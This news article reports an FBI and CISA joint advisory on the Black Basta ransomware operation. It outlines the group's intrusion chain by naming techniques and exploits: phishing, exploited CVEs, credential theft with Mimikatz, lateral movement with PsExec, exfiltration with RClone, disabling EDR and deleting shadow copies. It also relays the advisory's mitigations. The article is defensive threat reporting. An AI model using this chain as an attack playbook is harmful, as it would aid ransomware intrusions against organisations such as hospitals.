FBI warns Black Basta ransomware impacted over 500 organizations worldwide

A ransomware-as-a-service operation known as Black Basta has grown to be one of the most prolific cybercrime threats over the past two years, managing to compromise over 500 organizations from around the world. Many of its victims have been healthcare providers and organizations that operate critical infrastructure, according to the FBI.

“Healthcare organizations are attractive targets for cybercrime actors due to their size, technological dependence, access to personal health information, and unique impacts from patient care disruptions,” the FBI, the US Cybersecurity and Infrastructure Security Agency, the Department of Health and Human Services and the Multi-State Information Sharing and Analysis Center (MS-ISAC) said in a joint advisory.

The advisory includes indicators of compromise (IoCs), as well as tactics, techniques and procedures (TTPs) associated with Black Basta that the FBI collected during its investigations and from third-party sources. This information can be used for threat hunting and to build detections inside networks and is complemented by a series of mitigation recommendations provided by the authoring organizations.

How does Black Basta break into networks?

Like most modern ransomware operations, Black Basta operates on a service model, meaning its creators and maintainers handle the development and improvement of the file encrypting software, as well as its associated infrastructure — the victim negotiation site on the Dark Web, the public leak listing site and so on.

The targeting and infection tasks are outsourced to external cybercriminal contractors known as “affiliates” who earn a considerable percentage of any ransoms paid by organizations they compromise. Since these affiliates operate independently of each other, their initial access techniques will be varied, but there is some overlap.

The operation was launched sometime in the spring of 2022 and was first spotted in April of that year. Security experts believe it was created by people formerly affiliated with a notorious and now defunct ransomware operation called Conti, which itself was associated with an even older one called REvil. It is common in the ransomware ecosystem for operations to shut down when they attract too much attention from law enforcement and then rebrand under other names.

In the beginning, Black Basta affiliates used to break into organizations by using email spear phishing techniques to deploy some sort of trojan or backdoor via malicious attachments or links. Spear phishing remains one of the most common techniques to deploy malware and is used by nearly all cybercriminal gangs.

Another method is to buy access from so-called access brokers or malware distribution platforms. One of these platforms is a long-running botnet called Qakbot, or Qbot, and has been used both by Black Basta and Conti before it.

“Starting in February 2024, Black Basta affiliates began exploiting ConnectWise vulnerability CVE-2024-1709,” the FBI and its partners said in the joint advisory. “In some instances, affiliates have been observed abusing valid credentials.”

Black Basta’s goal is to gain admin credentials

Following the initial access, Black Basta affiliates will deploy and rely on a variety of system tools and dual-use programs to achieve privilege escalation and then move laterally through the network to other systems with the goal of compromising a domain controller and gaining administrative credentials.

This will then allow them to push the ransomware to as many computers on the network as possible using the usual management tools and application deployment mechanisms on Windows networks.

Some of the tools that the FBI saw Black Basta affiliates use include the SoftPerfect network scanner (netscan.exe) for network scanning, as well as reconnaissance tools with names that include Intel and Dell and are saved in the root of the C:\ folder.

Mimikatz is used to extract credentials stored on Windows systems and BITSAdmin and PsExec are used to execute commands and transfer files to other systems. RClone is used to exfiltrate data and the Cobalt Strike beacon, which is part of a penetration testing tool, is used as a backdoor to maintain remote access.

The Windows-native Remote Desktop Protocol (RDP) feature, as well as commercial screen sharing tools such as Splashtop and Screen Connect have also been used for remotely accessing compromised systems. “Black Basta affiliates have also exploited ZeroLogon (CVE-2020-1472), NoPac (CVE-2021-42278 and CVE-2021-42287) and PrintNightmare (CVE-2021-34527) vulnerabilities for local and Windows Active Domain privilege escalation,” the advisory stated.

The attackers also use custom tools such as PowerShell scripts and a tool called Backstab to disable endpoint detection and response (EDR) products running on systems before starting to encrypt files. The Windows vssadmin.exe utility is used to delete Volume Shadow copies that could help recover the encrypted files. The encrypted files will have the file extension .basta or a random one appended to them and a ransom note called readme.txt will be left on the system to direct the victims to an .onion link on the Tor network.

As with most modern ransomware operations, Black Basta engages in double extortion tactics. One is through file encryption which leaves victims unable to perform their normal business operations until they restore systems from external backups, which can be a lengthy process, and the second is the threat of leaking the exfiltrated sensitive business data publicly or selling it.

Black Basta mitigation guides

The joint cybersecurity advisory includes mitigations that were developed by CISA and the National Institute of Standards and Technology (NIST), as well as links to best practices and mitigation guides that are specific to organizations in the health sector. These cover asset management and security, access control management, email security and phishing prevention, vulnerability management and assessment and more.

The advisory also recommend organizations test and validate their security defenses against the Black Basta TTPs described in the advisory as they were mapped to the MITRE ATT&CK framework.

• Select an ATT&CK technique described in this advisory.
• Align your security technologies against the technique.
• Test your technologies against the technique.
• Analyze your detection and prevention technologies’ performance.
• Repeat the process for all security technologies to obtain a set of comprehensive performance data.
• Tune your security program, including people, processes, and technologies, based on the data generated by this process.